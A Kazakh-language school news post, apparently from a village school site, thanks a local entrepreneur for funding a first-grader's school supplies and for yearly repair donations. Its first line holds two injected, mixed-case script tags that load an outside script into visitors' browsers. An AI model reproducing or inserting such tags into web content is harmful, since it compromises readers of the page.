<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

23.11.2018

 

 

Жомарт жан.

Біздің ауылда биылғы оқу жылы   мектепке жол акциясы «Балаға мейірім сыйла!» үндеуімен өтті..  Акцияның  негізгі міндеті – аз қамтылған отбасыларындағы оқушылардың жаңа оқу жылына дайындалуға және балалардың әлеуметтік жағдайлары  бойынша мектепке бармауын алдын алу. Олардың мектеп формасы, оқуға  қажетті құрал-жабдықтармен толықтай қамтылып, алаңсыз білім алуына жағдай жасау.

        Республикалық акцияның  өту  барысында  Қызылтаң орта  мектеп әкімшілігінен шаруашылық қожалық,  жеке кәсіпкер иелеріне хаттар жолданды.Ауылымыздың тұрғыны жеке кәсіпкер,жомарт жан- Қадыров Бағдат,  «Кадыров » шаруашылық қожалығының  қолдауымен  1-сынып оқушысына  50мың теңге көлемінде көмек көрсетіліп,  мектепке дайын болды. Барлық қажетті құралдармен қамтылған  оқушы 1 қыркүйек күні білім нәрімен сусындауға мектепке келді.  Сонымен  қатар Бағдат ағамыз жылда мектептің жөндеу жұмысына қаржылай көмек береді.Жылда оқушыларымызға киім-кешек,мектепке қажетті құрал-саймандар алуға қаржылай көмек береді.

        Бағдат  ағамыз сияқты жомарт жандардың  мектепке қол ұшып беріп,көмек көрсетуі, дәстүрге айналуы қоғам тарапынан жасалып жатқан еліміздің болашағы баянды болуы үшін өскелең  ұрпақты  адами-рухани тәрбиелеу. Осындай   жүрегі  жомарт ағамызға алғысымыз шексіз. Бағдат ағамыздың отбасына амандық, деніне саулық берсін! - дейміз Мектеп әкімшілігі мен ата-аналар атынан осы қожалық иесіне алғысымызды білдіреміз.

Қызылтаң орта мектебінің тәрбие жұмысын ұйымдастырушы Байсеитова С.А.

Просмотров: 930

Қосымшалар:



Пікір қосу



Деректерді қолтаңбаға қосу